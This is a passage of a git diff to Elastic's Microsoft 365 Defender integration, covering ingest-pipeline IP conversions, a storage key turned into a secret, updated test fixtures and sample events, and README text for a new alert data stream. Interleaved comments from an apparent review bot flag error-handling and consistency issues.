"event", + "original": 
"{\"Tenant\":\"DefaultTenant\",\"category\":\"AdvancedHunting-DeviceInfo\",\"operationName\":\"Publish\",\"properties\":{\"AadDeviceId\":null,\"AdditionalFields\":null,\"AssetValue\":\"testvalue\",\"IsInternetFacing\":true,\"DeviceManualTags\":\"testtags\",\"DeviceDynamicTags\":\"testdynamictags\",\"ExposureLevel\":\"testlevel\",\"SensorHealthState\":\"somestatus\",\"ExclusionReason\":\"somereason\",\"IsExcluded\":false,\"ClientVersion\":\"10.8210.19041.2006\",\"DeviceCategory\":\"Endpoint\",\"DeviceId\":\"999b6fd7c532534ba50b3232fa992c38a2712345\",\"DeviceName\":\"testmachine6\",\"DeviceSubtype\":null,\"DeviceType\":\"Workstation\",\"IsAzureADJoined\":false,\"JoinType\":null,\"LoggedOnUsers\":\"[{\\\"UserName\\\":\\\"administrator1\\\"}, {\\\"UserName\\\":\\\"administrator2\\\"}]\",\"MachineGroup\":\"UnassignedGroup\",\"MergedDeviceIds\":null,\"MergedToDeviceId\":null,\"Model\":null,\"OSArchitecture\":null,\"OSBuild\":null,\"OSDistribution\":null,\"OSPlatform\":null,\"OSVersion\":null,\"OSVersionInfo\":null,\"OnboardingStatus\":\"Onboarded\",\"PublicIP\":\"-\",\"RegistryDeviceTag\":\"evaluation\",\"ReportId\":12942,\"Timestamp\":\"2022-11-08T05:56:25.8832339Z\",\"Vendor\":null},\"tenantId\":\"12345af3-bc0e-4f36-b08e-27759e912345\",\"time\":\"2022-11-08T06:01:15.8987913Z\"}", + "type": [ + "info" + ] + }, + "host": { + "id": "999b6fd7c532534ba50b3232fa992c38a2712345", + "name": "testmachine6", + "type": "Workstation" + }, + "m365_defender": { + "event": { + "active_users": [ + "administrator1", + "administrator2" + ], + "asset_value": "testvalue", + "category": "AdvancedHunting-DeviceInfo", + "client_version": "10.8210.19041.2006", + "device": { + "category": "Endpoint", + "id": "999b6fd7c532534ba50b3232fa992c38a2712345", + "name": "testmachine6", + "type": "Workstation" + }, + "device_dynamic_tags": "testdynamictags", + "device_manual_tags": "testtags", + "exclusion_reason": "somereason", + "exposure_level": "testlevel", + "is_azure_ad_joined": false, + 
"is_excluded": false, + "is_internet_facing": true, + "machine_group": "UnassignedGroup", + "onboarding_status": "Onboarded", + "operation_name": "Publish", + "registry": { + "device_tag": "evaluation" + }, + "report_id": "12942", + "sensor_health_state": "somestatus", + "tenant": { + "id": "12345af3-bc0e-4f36-b08e-27759e912345", + "name": "DefaultTenant" + }, + "time": "2022-11-08T06:01:15.898Z", + "timestamp": "2022-11-08T05:56:25.883Z" + } + }, + "observer": { + "type": "Endpoint", + "version": "10.8210.19041.2006" + }, + "related": { + "hosts": [ + "999b6fd7c532534ba50b3232fa992c38a2712345", + "testmachine6" + ], + "user": [ + "administrator1", + "administrator2" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] } ] } \ No newline at end of file diff --git a/packages/m365_defender/data_stream/event/elasticsearch/ingest_pipeline/pipeline_device.yml b/packages/m365_defender/data_stream/event/elasticsearch/ingest_pipeline/pipeline_device.yml index 2b94e0a1918..932a811688b 100644 --- a/packages/m365_defender/data_stream/event/elasticsearch/ingest_pipeline/pipeline_device.yml +++ b/packages/m365_defender/data_stream/event/elasticsearch/ingest_pipeline/pipeline_device.yml 
@@ -920,21 +920,53 @@ processors: target_field: m365_defender.event.previous.registry_value_name tag: rename_json_properties_PreviousRegistryValueName ignore_missing: true + - convert: + field: json.properties.FileOriginIP + type: ip + tag: convert_file_origin_ip + if: ctx.json?.properties?.FileOriginIP != null + on_failure: + - remove: + field: json.properties.FileOriginIP - rename: field: json.properties.FileOriginIP target_field: m365_defender.event.file.origin_ip tag: rename_json_properties_FileOriginIp ignore_missing: true + - convert: + field: json.properties.RemoteIP + type: ip + tag: convert_remote_ip + if: ctx.json?.properties?.RemoteIP != null + on_failure: + - remove: + field: json.properties.RemoteIP - rename: field: json.properties.RemoteIP target_field: m365_defender.event.remote.ip tag: rename_json_properties_RemoteIP ignore_missing: true + - convert: + field: json.properties.LocalIP + type: ip + tag: convert_local_ip + if: ctx.json?.properties?.LocalIP != null + on_failure: + - remove: + field: json.properties.LocalIP - rename: field: json.properties.LocalIP target_field: m365_defender.event.local.ip tag: rename_json_properties_LocalIP ignore_missing: true + - convert: + field: json.properties.RequestSourceIP + type: ip + tag: convert_request_source_ip + if: ctx.json?.properties?.RequestSourceIP != null + on_failure: + - remove: + field: json.properties.RequestSourceIP - rename: field: json.properties.RequestSourceIP target_field: m365_defender.event.request.source_ip @@ -955,6 +987,14 @@ processors: target_field: m365_defender.event.local.port tag: rename_json_properties_LocalPort ignore_missing: true + - convert: + field: json.properties.PublicIP + type: ip + tag: convert_public_ip + if: ctx.json?.properties?.PublicIP != null + on_failure: + - remove: + field: json.properties.PublicIP - rename: field: json.properties.PublicIP target_field: m365_defender.event.public_ip.value 
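Review bot: The `on_failure` handlers of the new `convert` processors for FileOriginIP, RemoteIP, LocalIP and RequestSourceIP (first hunk) and PublicIP (second hunk at this line) remove the field without recording why, so a malformed address becomes indistinguishable downstream from an absent one. The test fixture in this diff sends `"RemoteIP": "-"` and `"PublicIP": "-"`, which looks like the intended case, but the same handler also silences genuinely unexpected values. The `convert` added to the log pipeline in this same commit appends `{{{_ingest.on_failure_message}}}` to `error.message` before removing; adding `- append: field: error.message value: '{{{_ingest.on_failure_message}}}'` ahead of each `remove` here keeps the two pipelines consistent and the failures observable. If the `-` placeholder should stay silent, narrow the condition instead, e.g. `if: ctx.json?.properties?.RemoteIP != null && ctx.json.properties.RemoteIP != '-'`.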
@@ -1704,18 +1744,17 @@ processors: def commandLine = ctx.process.command_line; commandLine = commandLine.trim(); if (commandLine != "") { - ctx.process.command_line = commandLine; - - def args = new ArrayList(); - for (def v : / /.split(commandLine)) { - if (v != "") { - args.add(v); - } - } - if (args.length > 0) { - ctx.process.args = args; - ctx.process.args_count = args.length; - } + ctx.process.command_line = commandLine; + def args = new ArrayList(); + for (def v : / /.split(commandLine)) { + if (v != "") { + args.add(v); + } + } + if (args.length > 0) { + ctx.process.args = args; + ctx.process.args_count = args.length; + } } - script: description: Splits up the command line to populate more parent processor fields. @@ -1726,18 +1765,17 @@ processors: def commandLine = ctx.process.parent.command_line; commandLine = commandLine.trim(); if (commandLine != "") { - ctx.process.parent.command_line = commandLine; - - def args = new ArrayList(); - for (def v : / /.split(commandLine)) { - if (v != "") { - args.add(v); - } - } - if (args.length > 0) { - ctx.process.parent.args = args; - ctx.process.parent.args_count = args.length; - } + ctx.process.parent.command_line = commandLine; + def args = new ArrayList(); + for (def v : / /.split(commandLine)) { + if (v != "") { + args.add(v); + } + } + if (args.length > 0) { + ctx.process.parent.args = args; + ctx.process.parent.args_count = args.length; + } } # Geo mapping diff --git a/packages/m365_defender/data_stream/event/manifest.yml b/packages/m365_defender/data_stream/event/manifest.yml index 0f76dc9502d..03f55dc777a 100644 --- a/packages/m365_defender/data_stream/event/manifest.yml +++ b/packages/m365_defender/data_stream/event/manifest.yml 
@@ -40,13 +40,14 @@ streams: description: >- The name of the storage account where the consumer group's state/offsets will be stored and updated. - name: storage_account_key - type: text + type: password title: Storage Account Key multi: false required: true show_user: true description: >- The storage account key, this key will be used to authorize access to data in your storage account. + secret: true - name: storage_account_container type: text title: Storage Account Container diff --git a/packages/m365_defender/data_stream/incident/_dev/test/pipeline/test-incident.log-expected.json b/packages/m365_defender/data_stream/incident/_dev/test/pipeline/test-incident.log-expected.json index ee2bcf5acdc..7997aad91bb 100644 --- a/packages/m365_defender/data_stream/incident/_dev/test/pipeline/test-incident.log-expected.json +++ b/packages/m365_defender/data_stream/incident/_dev/test/pipeline/test-incident.log-expected.json @@ -708,12 +708,10 @@ "created_datetime": "2023-05-15T02:37:41.810Z", "odata_type": "#microsoft.graph.security.userEvidence", "remediation_status": "none", - "userAccount": { - "displayName": "Jens Luffe" - }, "user_account": { "account_name": "user", "azure_ad_user_id": "f149b355-542f-4216-bce3-5347cf02a4aa", + "display_name": "Jens Luffe", "domain_name": "corp.example", "user_principal_name": "user@example.com", "user_sid": "S-1-5-21-3978388234-3821721435-422805698-27297" @@ -1784,12 +1782,10 @@ "created_datetime": "2023-05-12T15:27:46.873Z", "odata_type": "#microsoft.graph.security.userEvidence", "remediation_status": "none", - "userAccount": { - "displayName": "Dennis Uber" - }, "user_account": { "account_name": "user3", "azure_ad_user_id": "6d4c2f48-1d1e-4c8f-8666-914b2085332c", + "display_name": "Dennis Uber", "domain_name": "corp.example", "user_principal_name": "user3@example.com", "user_sid": "S-1-5-21-3978388234-3821721435-422805698-30771" 
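Review bot: Moving `storage_account_key` to `type: password` with `secret: true` is the right change for a credential that was previously a plain `text` variable, but `secret: true` relies on Fleet secret storage, which as far as I recall needs the package manifest's `conditions.kibana.version` to require 8.12 or later; that manifest is not in this diff, so please verify the constraint or the package may fail validation or installation on older stacks. If other data streams in this package declare a credential variable of the same kind, they presumably need the same treatment in a follow-up.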
@@ -2035,12 +2031,10 @@ "created_datetime": "2023-05-12T12:14:33.386Z", "odata_type": "#microsoft.graph.security.userEvidence", "remediation_status": "none", - "userAccount": { - "displayName": "Eamon Hess" - }, "user_account": { "account_name": "user4", "azure_ad_user_id": "12145719-f684-456e-b8ba-f2f7c67ada56", + "display_name": "Eamon Hess", "domain_name": "corp.example", "user_principal_name": "user4@example.com", "user_sid": "S-1-5-21-3978388234-3821721435-422805698-3556" diff --git a/packages/m365_defender/data_stream/incident/elasticsearch/ingest_pipeline/default.yml b/packages/m365_defender/data_stream/incident/elasticsearch/ingest_pipeline/default.yml index 9bcb25a71f0..8218b8d721f 100644 --- a/packages/m365_defender/data_stream/incident/elasticsearch/ingest_pipeline/default.yml +++ b/packages/m365_defender/data_stream/incident/elasticsearch/ingest_pipeline/default.yml @@ -1526,6 +1526,15 @@ processors: field: _ingest._value.userAccount.accountName target_field: _ingest._value.user_account.account_name ignore_missing: true + - foreach: + field: json.alerts.evidence + if: ctx.json?.alerts?.evidence instanceof List + ignore_failure: true + processor: + rename: + field: _ingest._value.userAccount.displayName + target_field: _ingest._value.user_account.display_name + ignore_missing: true - foreach: field: json.alerts.evidence if: ctx.json?.alerts?.evidence instanceof List diff --git a/packages/m365_defender/data_stream/incident/fields/fields.yml b/packages/m365_defender/data_stream/incident/fields/fields.yml index 92236604767..c8110974669 100644 --- a/packages/m365_defender/data_stream/incident/fields/fields.yml +++ b/packages/m365_defender/data_stream/incident/fields/fields.yml 
@@ -207,6 +207,8 @@ - name: object_id type: keyword description: The unique identifier of the application object in Azure AD. + - name: odata_type + type: keyword - name: onboarding_status type: keyword description: 'The status of the machine onboarding to Microsoft Defender for Endpoint.The possible values are: insufficientInfo, onboarded, canBeOnboarded, unsupported, unknownFutureValue.' @@ -389,6 +391,9 @@ - name: azure_ad_user_id type: keyword description: The user object identifier in Azure AD. + - name: display_name + type: keyword + description: The user display name in Azure AD. - name: domain_name type: keyword description: The name of the Active Directory domain of which the user is a member. diff --git a/packages/m365_defender/data_stream/incident/sample_event.json b/packages/m365_defender/data_stream/incident/sample_event.json index efb38dbc66c..03a0156be1a 100644 --- a/packages/m365_defender/data_stream/incident/sample_event.json +++ b/packages/m365_defender/data_stream/incident/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-09-30T09:35:45.113Z", "agent": { - "ephemeral_id": "bfa54030-e0ce-4076-86d5-90314cd5425d", - "id": "b749ee7f-378d-45d8-8151-975dfa11ce57", + "ephemeral_id": "b25e1419-d728-4361-8b2c-b147f421b7c9", + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.8.2" + "version": "8.13.0" }, "cloud": { "account": { @@ -24,9 +24,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "b749ee7f-378d-45d8-8151-975dfa11ce57", - "snapshot": false, - "version": "8.8.2" + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", + "snapshot": true, + "version": "8.13.0" }, "event": { "action": [ 
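Review bot: `odata_type` is added without a `description:` while every neighbouring field in the hunk carries one, which leaves a gap in the generated field reference. Judging from the expected test output in this diff, the value is the OData type of the evidence entity (e.g. `#microsoft.graph.security.userEvidence`), so something like `description: The OData type of the evidence entity.` would do; confirm the field's parent object, which is outside the hunk.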
@@ -36,7 +36,7 @@ "created": "2021-08-13T08:43:35.553Z", "dataset": "m365_defender.incident", "id": "2972395", - "ingested": "2023-07-21T12:35:09Z", + "ingested": "2024-01-17T16:05:30Z", "kind": "alert", "original": "{\"@odata.type\":\"#microsoft.graph.security.incident\",\"alerts\":{\"@odata.type\":\"#microsoft.graph.security.alert\",\"actorDisplayName\":null,\"alertWebUrl\":\"https://security.microsoft.com/alerts/da637551227677560813_-961444813?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"assignedTo\":null,\"category\":\"DefenseEvasion\",\"classification\":\"unknown\",\"comments\":[],\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"description\":\"A hidden file has been launched. This activity could indicate a compromised host. Attackers often hide files associated with malicious tools to evade file system inspection and defenses.\",\"detectionSource\":\"antivirus\",\"detectorId\":\"e0da400f-affd-43ef-b1d5-afc2eb6f2756\",\"determination\":\"unknown\",\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"azureAdDeviceId\":null,\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"defenderAvStatus\":\"unknown\",\"deviceDnsName\":\"tempDns\",\"firstSeenDateTime\":\"2020-09-12T07:28:32.4321753Z\",\"healthStatus\":\"active\",\"loggedOnUsers\":[],\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"onboardingStatus\":\"onboarded\",\"osBuild\":22424,\"osPlatform\":\"Windows10\",\"rbacGroupId\":75,\"rbacGroupName\":\"UnassignedGroup\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"riskScore\":\"medium\",\"roles\":[\"compromised\"],\"tags\":[\"Test 
Machine\"],\"verdict\":\"unknown\",\"version\":\"Other\",\"vmMetadata\":{\"cloudProvider\":\"azure\",\"resourceId\":\"/subscriptions/8700d3a3-3bb7-4fbe-a090-488a1ad04161/resourceGroups/WdatpApi-EUS-STG/providers/Microsoft.Compute/virtualMachines/NirLaviTests\",\"subscriptionId\":\"8700d3a3-3bb7-4fbe-a090-488a1ad04161\",\"vmId\":\"ca1b0d41-5a3b-4d95-b48b-f220aed11d78\"}},{\"@odata.type\":\"#microsoft.graph.security.fileEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"detectionStatus\":\"detected\",\"fileDetails\":{\"fileName\":\"MsSense.exe\",\"filePath\":\"C:\\\\Program Files\\\\temp\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":6136392,\"issuer\":null,\"sha1\":\"5f1e8acedc065031aad553b710838eb366cfee9a\",\"sha256\":\"8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec\",\"signer\":null},\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"detectionStatus\":\"detected\",\"imageFile\":{\"fileName\":\"MsSense.exe\",\"filePath\":\"C:\\\\Program Files\\\\temp\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":6136392,\"issuer\":null,\"sha1\":\"5f1e8acedc065031aad553b710838eb366cfee9a\",\"sha256\":\"8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec\",\"signer\":null},\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"parentProcessCreationDateTime\":\"2021-08-12T07:39:09.0909239Z\",\"parentProcessId\":668,\"parentProcessImageFile\":{\"fileName\":\"services.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\",\"filePublisher\":\"Microsoft 
Corporation\",\"fileSize\":731744,\"issuer\":null,\"sha1\":null,\"sha256\":null,\"signer\":null},\"processCommandLine\":\"\\\"MsSense.exe\\\"\",\"processCreationDateTime\":\"2021-08-12T12:43:19.0772577Z\",\"processId\":4780,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"SYSTEM\",\"azureAdUserId\":null,\"domainName\":\"NT AUTHORITY\",\"userPrincipalName\":null,\"userSid\":\"S-1-5-18\"},\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.registryKeyEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"registryHive\":\"HKEY_LOCAL_MACHINE\",\"registryKey\":\"SYSTEM\\\\CONTROLSET001\\\\CONTROL\\\\WMI\\\\AUTOLOGGER\\\\SENSEAUDITLOGGER\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"unknown\"}],\"firstActivityDateTime\":\"2021-04-26T07:45:50.116Z\",\"id\":\"da637551227677560813_-961444813\",\"incidentId\":\"28282\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/28282?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"lastActivityDateTime\":\"2021-05-02T07:56:58.222Z\",\"lastUpdateDateTime\":\"2021-05-02T14:19:01.3266667Z\",\"mitreTechniques\":[\"T1564.001\"],\"providerAlertId\":\"da637551227677560813_-961444813\",\"recommendedActions\":\"Collect artifacts and determine scope\\n�\\tReview the machine timeline for suspicious activities that may have occurred before and after the time of the alert, and record additional related artifacts (files, IPs/URLs) \\n�\\tLook for the presence of relevant artifacts on other systems. 
Identify commonalities and differences between potentially compromised systems.\\n�\\tSubmit relevant files for deep analysis and review resulting detailed behavioral information.\\n�\\tSubmit undetected files to the MMPC malware portal\\n\\nInitiate containment \\u0026 mitigation \\n�\\tContact the user to verify intent and initiate local remediation actions as needed.\\n�\\tUpdate AV signatures and run a full scan. The scan might reveal and remove previously-undetected malware components.\\n�\\tEnsure that the machine has the latest security updates. In particular, ensure that you have installed the latest software, web browser, and Operating System versions.\\n�\\tIf credential theft is suspected, reset all relevant users passwords.\\n�\\tBlock communication with relevant URLs or IPs at the organization�s perimeter.\",\"resolvedDateTime\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"severity\":\"low\",\"status\":\"new\",\"tenantId\":\"b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"threatDisplayName\":null,\"threatFamilyName\":null,\"title\":\"Suspicious execution of hidden file\"},\"assignedTo\":\"KaiC@contoso.onmicrosoft.com\",\"classification\":\"truePositive\",\"comments\":[{\"comment\":\"Demo incident\",\"createdBy\":\"DavidS@contoso.onmicrosoft.com\",\"createdTime\":\"2021-09-30T12:07:37.2756993Z\"}],\"createdDateTime\":\"2021-08-13T08:43:35.5533333Z\",\"determination\":\"multiStagedAttack\",\"displayName\":\"Multi-stage incident involving Initial access \\u0026 Command and control on multiple endpoints reported by multiple sources\",\"id\":\"2972395\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/2972395?tid=12f988bf-16f1-11af-11ab-1d7cd011db47\",\"lastUpdateDateTime\":\"2021-09-30T09:35:45.1133333Z\",\"redirectIncidentId\":null,\"severity\":\"medium\",\"status\":\"active\",\"tags\":[\"Demo\"],\"tenantId\":\"b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\"}", "provider": "microsoftDefenderForEndpoint", 
@@ -327,4 +327,4 @@ } } } -} +} \ No newline at end of file diff --git a/packages/m365_defender/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/m365_defender/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 0420c416e3c..a771b124284 100644 --- a/packages/m365_defender/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/m365_defender/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -262,6 +262,17 @@ processors: ######################### ## ECS Related Mapping ## ######################### + - convert: + field: json.alerts.entities.ipAddress + type: ip + if: ctx.json?.alerts?.entities?.ipAddress != null + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - remove: + field: + - json.alerts.entities.ipAddress - append: field: related.ip value: "{{{json.alerts.entities.ipAddress}}}" diff --git a/packages/m365_defender/data_stream/log/sample_event.json b/packages/m365_defender/data_stream/log/sample_event.json index 65b4ca1ad2b..fa4c6ea5ed6 100644 --- a/packages/m365_defender/data_stream/log/sample_event.json +++ b/packages/m365_defender/data_stream/log/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2020-09-06T12:07:55.32Z", "agent": { - "ephemeral_id": "538b61a2-ee8e-4f0f-92b3-874bb25bd07c", - "id": "761cded5-abcb-4ec8-a5e6-f7546489e271", + "ephemeral_id": "75fd76e4-ea58-4f89-92b4-6d1acb0a10bb", + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.13.0" }, "cloud": { "provider": "azure" @@ -19,9 +19,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "761cded5-abcb-4ec8-a5e6-f7546489e271", - "snapshot": false, - "version": "8.7.1" + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", + "snapshot": true, + "version": "8.13.0" }, "event": { "action": "InitialAccess", 
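Review bot: The new `convert` for `json.alerts.entities.ipAddress` in the log pipeline hunk has no `tag`, unlike the converts added to the device pipeline in this same commit, so the `error.message` entry it appends cannot be traced back to this processor when triaging parse failures; add `tag: convert_alerts_entities_ip_address` for consistency. The following context line still appends `{{{json.alerts.entities.ipAddress}}}` to `related.ip` after the field may have been removed; whether that append is guarded by an `if` lies outside the hunk, so verify it does not push an empty value into `related.ip` on the failure path.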
@@ -34,7 +34,7 @@ "duration": 0, "end": "2020-09-06T12:04:00Z", "id": "faf8edc936-85f8-a603-b800-08d8525cf099", - "ingested": "2023-08-08T07:59:58Z", + "ingested": "2024-01-17T16:06:28Z", "kind": "alert", "original": "{\"alerts\":{\"actorName\":null,\"alertId\":\"faf8edc936-85f8-a603-b800-08d8525cf099\",\"assignedTo\":\"Automation\",\"category\":\"InitialAccess\",\"classification\":null,\"creationTime\":\"2020-09-06T12:07:54.3716642Z\",\"description\":\"This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.2\",\"detectionSource\":\"OfficeATP\",\"determination\":null,\"devices\":[],\"entities\":{\"aadUserId\":null,\"accountName\":null,\"clusterBy\":null,\"deliveryAction\":null,\"deviceId\":null,\"domainName\":null,\"entityType\":\"MailBox\",\"fileName\":null,\"filePath\":null,\"ipAddress\":null,\"mailboxAddress\":\"testUser3@contoso.com\",\"mailboxDisplayName\":\"test User3\",\"parentProcessCreationTime\":null,\"parentProcessId\":null,\"processCommandLine\":null,\"processCreationTime\":null,\"processId\":null,\"recipient\":null,\"registryHive\":null,\"registryKey\":null,\"registryValue\":null,\"registryValueType\":null,\"securityGroupId\":null,\"securityGroupName\":null,\"sender\":null,\"sha1\":null,\"sha256\":null,\"subject\":null,\"url\":null,\"userPrincipalName\":\"testUser3@contoso.com\",\"userSid\":null},\"firstActivity\":\"2020-09-06T12:04:00Z\",\"incidentId\":924518,\"investigationId\":null,\"investigationState\":\"Queued\",\"lastActivity\":\"2020-09-06T12:04:00Z\",\"lastUpdatedTime\":\"2020-09-06T12:37:40.88Z\",\"mitreTechniques\":[],\"resolvedTime\":null,\"serviceSource\":\"OfficeATP\",\"severity\":\"Informational\",\"status\":\"InProgress\",\"threatFamilyName\":null,\"title\":\"Email reported by user as malware or 
phish\"},\"assignedTo\":null,\"classification\":\"Unknown\",\"comments\":[],\"createdTime\":\"2020-09-06T12:07:55.1366667Z\",\"determination\":\"NotAvailable\",\"incidentId\":924518,\"incidentName\":\"Email reported by user as malware or phish\",\"lastUpdateTime\":\"2020-09-06T12:07:55.32Z\",\"redirectIncidentId\":null,\"severity\":\"Informational\",\"status\":\"Active\",\"tags\":[]}", "provider": "OfficeATP", @@ -106,4 +106,4 @@ "user": { "name": "testUser3@contoso.com" } -} +} \ No newline at end of file diff --git a/packages/m365_defender/docs/README.md b/packages/m365_defender/docs/README.md index ab8db4d913f..b520e33c2ba 100644 --- a/packages/m365_defender/docs/README.md +++ b/packages/m365_defender/docs/README.md @@ -2,7 +2,7 @@ ## Overview -The [Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender) integration allows you to monitor Incident (Microsoft Graph Security API) and Event (Streaming API) Logs. Microsoft 365 Defender is a unified pre and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks. +The [Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender) integration allows you to monitor Alert, Incident (Microsoft Graph Security API) and Event (Streaming API) Logs. Microsoft 365 Defender is a unified pre and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks. Use the Microsoft 365 Defender integration to collect and parse data from the Microsoft Azure Event Hub, Microsoft Graph Security v1.0 REST API and Microsoft 365 Defender API. Then visualise that data in Kibana. 
@@ -10,7 +10,9 @@ For example, you could use the data from this integration to consolidate and cor ## Data streams -The Microsoft 365 Defender integration collects logs for three types of events: Event, Incident and Log. +The Microsoft 365 Defender integration collects logs for four types of events: Alert, Event, Incident and Log. + +**Alert:** This data streams leverages the [M365 Defender Streaming API](https://learn.microsoft.com/en-us/graph/api/resources/security-alert?view=graph-rest-1.0) to collect alerts including suspicious activities in a customer's tenant that Microsoft or partner security providers have identified and flagged for action. **Event (Recommended):** This data streams leverages the [M365 Defender Streaming API](https://learn.microsoft.com/en-us/microsoft-365/security/defender/streaming-api?view=o365-worldwide) to collect Alert, Device, Email, App and Identity Events. Events are streamed to an Azure Event Hub. For a list of Supported Events exposed by the Streaming API and supported by Elastic's integration, please see Microsoft's documentation [here](https://learn.microsoft.com/en-us/microsoft-365/security/defender/supported-event-types?view=o365-worldwide). 
@@ -73,6 +75,487 @@ For **Event**, in filebeat [Azure Event Hub](https://www.elastic.co/guide/en/bea ## Logs reference +### alert + +This is the `alert` dataset. + +#### Example + +An example event for `alert` looks as following: + +```json +{ + "@timestamp": "2023-10-20T09:54:07.503Z", + "agent": { + "ephemeral_id": "3e24a8f6-11a3-415f-b6d6-c5188d9239f6", + "id": "26c7b361-0790-47aa-b465-a57c5d8ab6b8", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.7.1" + }, + "cloud": { + "account": { + "id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39" + } + }, + "data_stream": { + "dataset": "m365_defender.alert", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "26c7b361-0790-47aa-b465-a57c5d8ab6b8", + "snapshot": false, + "version": "8.7.1" + }, + "event": { + "action": [ + "detected" + ], + "agent_id_status": "verified", + "category": [ + "host", + "iam", + "network", + "process" + ], + "created": "2023-10-20T09:53:09.883Z", + "dataset": "m365_defender.alert", + "duration": 2478000000, + "end": "2023-10-20T09:51:41.993Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "ingested": "2024-01-29T06:22:16Z", + "kind": "alert", + "original": "{\"actorDisplayName\":null,\"additionalData\":null,\"alertPolicyId\":null,\"alertWebUrl\":\"https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"assignedTo\":null,\"category\":\"Execution\",\"classification\":null,\"comments\":[],\"createdDateTime\":\"2023-10-20T09:53:09.8839373Z\",\"description\":\"A suspicious PowerShell activity was observed on the machine. \\nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. 
Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.\",\"detectionSource\":\"microsoftDefenderForEndpoint\",\"detectorId\":\"7f1c3609-a3ff-40e2-995b-c01770161d68\",\"determination\":null,\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"azureAdDeviceId\":\"f18bd540-d5e4-46e0-8ddd-3d03a59e4e14\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"defenderAvStatus\":\"notSupported\",\"detailedRoles\":[\"PrimaryDevice\"],\"deviceDnsName\":\"clw555test\",\"firstSeenDateTime\":\"2023-10-20T09:50:17.7383987Z\",\"healthStatus\":\"inactive\",\"ipInterfaces\":[\"192.168.5.65\",\"fe80::cfe4:80b:615c:38fb\",\"127.0.0.1\",\"::1\"],\"loggedOnUsers\":[{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\"}],\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"onboardingStatus\":\"onboarded\",\"osBuild\":22621,\"osPlatform\":\"Windows11\",\"rbacGroupId\":0,\"rbacGroupName\":null,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"riskScore\":\"high\",\"roles\":[],\"tags\":[],\"verdict\":\"unknown\",\"version\":\"22H2\",\"vmMetadata\":null},{\"@odata.type\":\"#microsoft.graph.security.userEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"azureAdUserId\":null,\"displayName\":null,\"d